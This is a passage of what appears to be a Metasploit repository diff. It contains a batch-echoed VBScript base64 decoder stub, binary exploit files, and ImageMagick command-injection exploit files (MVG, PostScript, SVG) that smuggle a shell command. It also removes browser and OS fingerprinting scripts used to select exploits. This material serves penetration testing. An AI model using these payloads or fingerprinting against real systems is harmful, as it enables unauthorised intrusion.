echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

BIN
data/exploits/cve-2016-0051/cve-2016-0051.x86.dll Normal file
View File

Binary file not shown.

BIN
data/exploits/cve-2016-0189/ielocalserver.dll Normal file
View File

Binary file not shown.

BIN
data/exploits/cve-2016-0189/ieshell32.dll Normal file
View File

Binary file not shown.

BIN
data/exploits/cve-2016-6415/sendpacket.raw Executable file
View File

Binary file not shown.

8
data/exploits/imagemagick/delegate/msf.mvg Normal file
View File

@ -0,0 +1,8 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 'https://localhost";echo vulnerable > /dev/tty"'
pop graphic-context
pop graphic-context

4
data/exploits/imagemagick/delegate/msf.ps Normal file
View File

@ -0,0 +1,4 @@
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%echo vulnerable > /dev/tty)
.putdeviceparams
quit

5
data/exploits/imagemagick/delegate/msf.svg Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
xlink:href="&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x22;&#x3b;echo vulnerable > /dev/tty&#x22;" />
</svg>
Side by Side

After

Width:  |  Height:  |  Size: 604 B

8
data/exploits/imagemagick/popen/msf.mvg Normal file
View File

@ -0,0 +1,8 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|echo vulnerable > /dev/tty'
pop graphic-context
pop graphic-context

5
data/exploits/imagemagick/popen/msf.svg Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
xlink:href="&#x7c;echo vulnerable > /dev/tty" />
</svg>
Side by Side

After

Width:  |  Height:  |  Size: 490 B

BIN
data/exploits/office_ole_multiple_dll_hijack.ppsx Normal file
View File

Binary file not shown.

BIN
data/exploits/poison_ivy_c2/chunk_214.bin Normal file
View File

Binary file not shown.

89
data/js/detect/ie_addons.js
View File

@ -1,89 +0,0 @@
var ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
try {
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
}
catch (e) {
types[i-1] = null;
}
}
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == 'object')
{
version = "2012";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == null)
{
version = "2010";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == null && types[4] == null)
{
version = "2007";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
types[3] == null && types[4] == null)
{
version = "2003";
}
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
types[3] == null && types[4] == null)
{
// If run for the first time, you must manullay allow the "Microsoft Office XP"
// add-on to run. However, this prompt won't show because the ActiveXObject statement
// is wrapped in an exception handler.
version = "xp";
}
else {
version = null;
}
return version;
}

157
data/js/detect/misc_addons.js
View File

@ -1,157 +0,0 @@
var misc_addons_detect = { };
/**
* Detects whether the browser supports Silverlight or not
**/
misc_addons_detect.hasSilverlight = function () {
var found = false;
//
// When on IE, we can use AgControl.AgControl to actually detect the version too.
// But this ability is specific to IE, so we fall back to just true/false response
//
try {
var ax = new ActiveXObject('AgControl.AgControl');
found = true;
} catch(e) {}
//
// ActiveX didn't get anything, try looking in MIMEs
//
if (!found) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i < mimes.length; i++) {
if (/x\-silverlight/.test(mimes[i].type)) {
found = true;
break;
}
}
}
//
// MIMEs didn't work either. Try navigator.
//
if (!found) {
var count = navigator.plugins.length;
for (var i=0; i < count; i++) {
var pluginName = navigator.plugins[i].name;
if (/Silverlight Plug\-In/.test(pluginName)) {
found = true;
break;
}
}
}
return found;
}
/**
* Returns the Adobe Flash version
**/
misc_addons_detect.getFlashVersion = function () {
var foundVersion = null;
//
// Gets the Flash version by using the GetVariable function via ActiveX
//
try {
var ax = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').toString();
foundVersion = ax.match(/[\d,]+/g)[0].replace(/,/g, '.')
} catch (e) {}
//
// This should work fine for most non-IE browsers
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var pluginDesc = mimes[i].enabledPlugin.description.toString();
var m = pluginDesc.match(/Shockwave Flash [\d\.]+/g);
if (m != null) {
foundVersion = m[0].match(/\d.+/g)[0];
break;
}
}
}
//
// Detection for Windows + Firefox
//
if (foundVersion == null) {
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Shockwave Flash/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}
/**
* Returns the Java version
**/
misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}

831
data/js/detect/os.js
View File

@ -1,831 +0,0 @@
// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
var clients_opera = "Opera";
var clients_ie = "MSIE";
var clients_ff = "Firefox";
var clients_chrome = "Chrome";
var clients_safari = "Safari";
// All of these should match up with constants in ::Msf::OperatingSystems
var oses_linux = "Linux";
var oses_android = "Android";
var oses_windows = "Windows";
var oses_mac_osx = "Mac OS X";
var oses_apple_ios = "iOS";
var oses_freebsd = "FreeBSD";
var oses_netbsd = "NetBSD";
var oses_openbsd = "OpenBSD";
// All of these should match up with the ARCH_* constants
var arch_armle = "armle";
var arch_x86 = "x86";
var arch_x86_64 = "x86_64";
var arch_ppc = "ppc";
var arch_mipsle = "mipsle";
var os_detect = {};
/**
* This can reliably detect browser versions for IE and Firefox even in the
* presence of a spoofed User-Agent. OS detection is more fragile and
* requires truthful navigator.appVersion and navigator.userAgent strings in
* order to be accurate for more than just IE on Windows.
**/
os_detect.getVersion = function(){
//Default values:
var os_name;
var os_vendor;
var os_device;
var os_flavor;
var os_sp;
var os_lang;
var ua_name;
var ua_version;
var arch = "";
var useragent = navigator.userAgent;
// Trust but verify...
var ua_is_lying = false;
var version = "";
var unknown_fingerprint = null;
var css_is_valid = function(prop, propCamelCase, css) {
if (!document.createElement) return false;
var d = document.createElement('div');
d.setAttribute('style', prop+": "+css+";")
return d.style[propCamelCase] === css;
}
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//--
// Client
//--
if (window.opera) {
ua_name = clients_opera;
if (!navigator.userAgent.match(/Opera/)) {
ua_is_lying = true;
}
// This seems to be completely accurate, e.g. "9.21" is the return
// value of opera.version() when run on Opera 9.21
ua_version = opera.version();
if (!os_name) {
// The 'inconspicuous' argument is there to give us a real value on
// Opera 6 where, without it, the return value is supposedly
// 'Hm, were you only as smart as Bjorn Vermo...'
// though I have not verfied this claim.
switch (opera.buildNumber('inconspicuous')) {
case "344": // opera-9.0-20060616.1-static-qt.i386-en-344
case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)
case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm
case "2474": // Opera 9.63 / Debian Testing (Lenny)
case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron)
case "6386": // 10.61
os_name = oses_linux;
break;
case "1074": // Opera 11.50 / Windows XP
case "1100": // Opera 11.52 / Windows XP
case "3445": // 10.61
case "3516": // Opera 10.63 / Windows XP
case "7730": // Opera 8.54 / Windows XP
case "8502": // "Opera 9 Eng Setup.exe"
case "8679": // "Opera_9.10_Eng_Setup.exe"
case "8771": // "Opera_9.20_Eng_Setup.exe"
case "8776": // "Opera_9.21_Eng_Setup.exe"
case "8801": // "Opera_9.22_Eng_Setup.exe"
case "10108": // "Opera_952_10108_en.exe"
case "10467": // "Opera_962_en_Setup.exe"
case "10476": // Opera 9.63 / Windows XP
case "WMD-50433": // Windows Mobile - "Mozilla/5.0 (Windows Mobile; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.00"
os_name = oses_windows;
break;
case "2480": // Opera 9.64 / FreeBSD 7.0
os_name = oses_freebsd;
break;
case "6386": // 10.61
os_name = oses_mac_osx;
break;
case "1407":
// In the case of mini versions, the UA is quite a bit
// harder to spoof, so it's correspondingly easier to
// trust. Unfortunately, despite being fairly truthful in
// what OS it's running on, Opera mini seems to lie like a
// rug in regards to the browser version.
//
// iPhone, iOS 5.0.1
// Opera/9.80 (iPhone; Opera Mini/7.1.32694/27.1407; U; en) Presto/2.8.119 Version/11.10.10
// Android 2.3.6, opera mini 7.1
// Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10
if (navigator.userAgent.indexOf("Android")) {
os_name = oses_android;
} else if (navigator.userAgent.indexOf("iPhone")) {
os_name = oses_apple_ios;
os_device = "iPhone";
}
break;
// A few are ambiguous, record them here
case "1250":
// Opera 9.80 / Windows XP
// Opera 11.61 / Windows XP
// Opera 11.61 / Debian 4.0 (Etch)
break;
default:
unknown_fingerprint = opera.buildNumber('inconspicuous');
break;
}
}
} else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel
// Then this is webkit, could be Safari or Chrome.
// Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
// Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
// Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
// Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148
// Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
// Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3
// Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+)
if (window.chromium || window.google || window.chrome) {
ua_name = clients_chrome;
search = "Chrome";
} else {
ua_name = clients_safari;
search = "Version";
}
platform = navigator.platform.toLowerCase();
// Just to be a pain, iPod and iPad both leave off "Safari" and
// "Version" in the UA, see example above. Grab the webkit version
// instead. =/
if (platform.match(/ipod/)) {
os_name = oses_apple_ios;
os_device = "iPod";
arch = arch_armle;
search = "AppleWebKit";
} else if (platform.match(/ipad/)) {
os_name = oses_apple_ios;
os_device = "iPad";
arch = arch_armle;
search = "AppleWebKit";
} else if (platform.match(/iphone/)) {
os_name = oses_apple_ios;
os_device = "iPhone";
arch = arch_armle;
} else if (platform.match(/macintel/)) {
os_name = oses_mac_osx;
arch = arch_x86;
} else if (platform.match(/linux/)) {
os_name = oses_linux;
if (platform.match(/x86_64/)) {
arch = arch_x86_64;
} else if (platform.match(/arm/)) {
arch = arch_armle;
} else if (platform.match(/x86/)) {
arch = arch_x86;
} else if (platform.match(/mips/)) {
arch = arch_mipsle;
}
// Android overrides Linux
if (navigator.userAgent.match(/android/i)) {
os_name = oses_android;
}
} else if (platform.match(/windows/)) {
os_name = oses_windows;
}
ua_version = this.searchVersion(search, navigator.userAgent);
if (!ua_version || 0 == ua_version.length) {
ua_is_lying = true;
}
} else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) {
// Use taintEnabled to identify FF since other recent browsers
// implement window.getComputedStyle now. For some reason, checking for
// taintEnabled seems to cause IE 6 to stop parsing, so make sure this
// isn't IE first.
// Also check MozBlobBuilder because FF 9.0.1 does not support taintEnabled
// Then this is a Gecko derivative, assume Firefox since that's the
// only one we have sploits for. We may need to revisit this in the
// future. This works for multi/browser/mozilla_compareto against
// Firefox and Mozilla, so it's probably good enough for now.
ua_name = clients_ff;
// Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('closest' in Element.prototype) {
ua_version = '35.0';
} else if ('matches' in Element.prototype) {
ua_version = '34.0';
} else if ('RadioNodeList' in window) {
ua_version = '33.0';
} else if ('copyWithin' in Array.prototype) {
ua_version = '32.0';
} else if ('fill' in Array.prototype) {
ua_version = '31.0';
} else if (css_is_valid('background-blend-mode', 'backgroundBlendMode', 'multiply')) {
ua_version = '30.0';
} else if (css_is_valid('box-sizing', 'boxSizing', 'border-box')) {
ua_version = '29.0';
} else if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) {
ua_version = '28.0';
} else if (css_is_valid('cursor', 'cursor', 'grab')) {
ua_version = '27.0';
} else if (css_is_valid('image-orientation',
'imageOrientation',
'0deg')) {
ua_version = '26.0';
} else if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document &&
document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0';
} else if ('imul' in Math) {
ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0';
} else if ('devicePixelRatio' in window) {
ua_version = '18.0';
} else if ('createElement' in document &&
document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) {
ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0';
} else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) {
ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0';
} else if ('Map' in window) {
ua_version = "13.0";
} else if ('mozConnection' in navigator) {
ua_version = "12.0";
} else if ('mozVibrate' in navigator) {
ua_version = "11.0";
} else if (css_is_valid('-moz-backface-visibility', 'MozBackfaceVisibility', 'hidden')) {
ua_version = "10.0";
} else if ('doNotTrack' in navigator) {
ua_version = "9.0";
} else if ('insertAdjacentHTML' in document.body) {
ua_version = "8.0";
} else if ('ondeviceorientation' in window && !('createEntityReference' in document)) {
ua_version = "7.0";
} else if ('MozBlobBuilder' in window) {
ua_version = "6.0";
} else if ('isGenerator' in Function) {
ua_version = "5.0";
} else if ('isArray' in Array) {
ua_version = "4.0";
} else if (document.readyState) {
ua_version = "3.6";
} else if (String.trimRight) {
ua_version = "3.5";
} else if (document.getElementsByClassName) {
ua_version = "3";
} else if (window.Iterator) {
ua_version = "2";
} else if (Array.every) {
ua_version = "1.5";
} else {
ua_version = "1";
}
if (navigator.oscpu != navigator.platform) {
ua_is_lying = true;
}
// oscpu is unaffected by changes in the useragent and has values like:
// "Linux i686"
// "Windows NT 6.0"
// haven't tested on 64-bit Windows
version = navigator.oscpu;
if (version.match(/i.86/)) {
arch = arch_x86;
}
if (version.match(/x86_64/)) {
arch = arch_x86_64;
}
if (version.match(/Windows/)) {
os_name = oses_windows;
// Technically these will mismatch server OS editions, but those are
// rarely used as client systems and typically have the same exploit
// characteristics as the associated client.
switch(version) {
case "Windows NT 5.0": os_name = "Windows 2000"; break;
case "Windows NT 5.1": os_name = "Windows XP"; break;
case "Windows NT 5.2": os_name = "Windows 2003"; break;
case "Windows NT 6.0": os_name = "Windows Vista"; break;
case "Windows NT 6.1": os_name = "Windows 7"; break;
case "Windows NT 6.2": os_name = "Windows 8"; break;
case "Windows NT 6.3": os_name = "Windows 8.1"; break;
}
}
if (version.match(/Linux/)) {
os_name = oses_linux;
}
// end navigator.oscpu checks
} else if (typeof ScriptEngineMajorVersion == "function") {
// Then this is IE and we can very reliably detect the OS.
// Need to add detection for IE on Mac. Low priority, since we
// don't have any sploits for it yet and it's a very low market
// share.
os_name = oses_windows;
ua_name = clients_ie;
version_maj = ScriptEngineMajorVersion().toString();
version_min = ScriptEngineMinorVersion().toString();
version_build = ScriptEngineBuildVersion().toString();
version = version_maj + version_min + version_build;
//document.write("ScriptEngine: "+version+"<br />");
switch (version){
case "514615":
// IE 5.00.2920.0000, 2000 Advanced Server SP0 English
ua_version = "5.0";
os_name = "Windows 2000";
os_sp = "SP0";
break;
case "515907":
os_name = "Windows 2000";
os_sp = "SP3"; //or SP2: oCC.getComponentVersion('{22d6f312-b0f6-11d0-94ab-0080c74c7e95}', 'componentid') => 6,4,9,1109
break;
case "518513":
os_name = "Windows 2000";
os_sp = "SP4";
break;
case "566626":
// IE 6.0.2600.0000, XP SP0 English
// IE 6.0.2800.1106, XP SP1 English
ua_version = "6.0";
os_name = "Windows XP";
os_sp = "SP0";
break;
case "568515":
// IE 6.0.3790.0, 2003 Standard SP0 English
ua_version = "6.0";
os_name = "Windows 2003";
os_sp = "SP0";
break;
case "568820":
// IE 6.0.2900.2180, xp sp2 english
os_name = "Windows XP";
os_sp = "SP2";
break;
case "568827":
os_name = "Windows 2003";
os_sp = "SP1";
break;
case "568831": //XP SP2 -OR- 2K SP4
if (os_name == "2000"){
os_sp = "SP4";
}
else{
os_name = "Windows XP";
os_sp = "SP2";
}
break;
case "568832":
os_name = "Windows 2003";
os_sp = "SP2";
break;
case "568837":
// IE 6.0.2900.2180, XP Professional SP2 Korean
ua_version = "6.0";
os_name = "Windows XP";
os_sp = "SP2";
break;
case "5716599":
// IE 7.0.5730.13, XP Professional SP3 English
// IE 6.0.2900.5512, XP Professional SP3 English
// IE 6.0.2900.5512, XP Professional SP3 Spanish
//
// Since this scriptengine applies to more than one major version of
// IE, rely on the object detection below to determine ua_version.
//ua_version = "6.0";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "575730":
// IE 7.0.5730.13, Server 2003 Standard SP2 English
// IE 7.0.5730.13, Server 2003 Standard SP1 English
// IE 7.0.5730.13, XP Professional SP2 English
// Rely on the user agent matching above to determine the OS.
// This will incorrectly identify 2k3 SP1 as SP2
ua_version = "7.0";
os_sp = "SP2";
break;
case "5718066":
// IE 7.0.5730.13, XP Professional SP3 English
ua_version = "7.0";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "5722589":
// IE 7.0.5730.13, XP Professional SP3 English
ua_version = "7.0";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "576000":
// IE 7.0.6000.16386, Vista Ultimate SP0 English
ua_version = "7.0";
os_name = "Windows Vista";
os_sp = "SP0";
break;
case "580":
// IE 8.0.7100.0, Windows 7 English
// IE 8.0.7100.0, Windows 7 64-bit English
case "5816385":
// IE 8.0.7600.16385, Windows 7 English
case "5816475":
case "5816762":
// IE 8.0.7600.16385, Windows 7 English
ua_version = "8.0";
os_name = "Windows 7";
os_sp = "SP0";
break;
case "5817514":
// IE 8.0.7600.17514, Windows 7 SP1 English
ua_version = "8.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "5818702":
// IE 8.0.6001.18702, XP Professional SP3 English
case "5822960":
// IE 8.0.6001.18702, XP Professional SP3 Greek
ua_version = "8.0";
os_name = "Windows XP";
os_sp = "SP3";
break;
case "9016406":
// IE 9.0.7930.16406, Windows 7 64-bit
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP0";
break;
case "9016441":
// IE 9.0.8112.16421, Windows 7 32-bit English
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016443":
// IE 9.0.8112.16421, Windows 7 Polish
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016446":
// IE 9.0.8112.16421, Windows 7 English (Update Versions: 9.0.7 (KB2699988)
// Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASA; InfoPath.3; MS-RTC LM 8; BRI/2)
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016464":
// browsershots.org, MSIE 7.0 / Windows 2008 R2
os_name = "Windows 2008 R2";
ua_version = "9.0";
break;
case "9016470":
// IE 9.0.8112.16421 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016502":
// IE 9.0.8112.16502 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016506":
// IE 9.0.8112.16506 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016514":
// IE 9.0.8112.16514 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016520":
// IE 9.0.8112.16520 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016526":
// IE 9.0.8112.16526 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "9016533":
// IE 9.0.8112.16533 / Windows 7 SP1
ua_version = "9.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "11016428":
// IE 11.0.9600.16428 / Windows 7 SP1
ua_version = "11.0";
os_name = "Windows 7";
os_sp = "SP1";
break;
case "10016384":
// IE 10.0.9200.16384 / Windows 8 x86
ua_version = "10.0";
os_name = "Windows 8";
os_sp = "SP0";
break;
case "11016426":
// IE 11.0.9600.16476 / KB2898785 (Technically: 11.0.2) Windows 8.1 x86 English
ua_version = "11.0";
os_name = "Windows 8.1";
break;
case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0";
os_name = "Windows 8";
os_sp = "SP0";
break;
case "1100":
// IE 11.0.10011.0 Windows 10.0 (Build 10074) English - insider preview
ua_version = "11.0";
os_name = "Windows 10";
os_sp = "SP0";
break;
default:
unknown_fingerprint = version;
break;
}
if (!ua_version) {
// The ScriptEngine functions failed us, try some object detection
if (document.documentElement && (typeof document.documentElement.style.maxHeight)!="undefined") {
// IE 11 detection, see: http://msdn.microsoft.com/en-us/library/ie/bg182625(v=vs.85).aspx
try {
if (document.__proto__ != undefined) { ua_version = "11.0"; }
} catch (e) {}
// IE 10 detection using nodeName
if (!ua_version) {
try {
var badNode = document.createElement && document.createElement("badname");
if (badNode && badNode.nodeName === "BADNAME") { ua_version = "10.0"; }
} catch(e) {}
}
// IE 9 detection based on a "Object doesn't support property or method" error
if (!ua_version) {
try {
document.BADNAME();
} catch(e) {
if (e.message.indexOf("BADNAME") > 0) {
ua_version = "9.0";
}
}
}
// IE8 detection straight from IEBlog. Thank you Microsoft.
if (!ua_version) {
try {
ua_version = "8.0";
document.documentElement.style.display = "table-cell";
} catch(e) {
// This executes in IE7,
// but not IE8, regardless of mode
ua_version = "7.0";
}
}
} else if (document.compatMode) {
ua_version = "6.0";
} else if (window.createPopup) {
ua_version = "5.5";
} else if (window.attachEvent) {
ua_version = "5.0";
} else {
ua_version = "4.0";
}
switch (navigator.appMinorVersion){
case ";SP2;":
os_sp = "SP2";
break;
}
}
}
if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; }
//--
// Figure out the type of Windows
//--
if (!ua_is_lying) {
version = useragent.toLowerCase();
} else if (navigator.oscpu) {
// Then this is Gecko and we can get at least os_name without the
// useragent
version = navigator.oscpu.toLowerCase();
} else {
// All we have left is the useragent and we know it's lying, so don't bother
version = " ";
}
if (!os_name || 0 == os_name.length) {
if (version.indexOf("windows") != -1) { os_name = oses_windows; }
else if (version.indexOf("mac") != -1) { os_name = oses_mac_osx; }
else if (version.indexOf("linux") != -1) { os_name = oses_linux; }
}
if (os_name == oses_windows) {
if (version.indexOf("windows 95") != -1) { os_name = "Windows 95"; }
else if (version.indexOf("windows nt 4") != -1) { os_name = "Windows NT"; }
else if (version.indexOf("win 9x 4.9") != -1) { os_name = "Windows ME"; }
else if (version.indexOf("windows 98") != -1) { os_name = "Windows 98"; }
else if (version.indexOf("windows nt 5.0") != -1) { os_name = "Windows 2000"; }
else if (version.indexOf("windows nt 5.1") != -1) { os_name = "Windows XP"; }
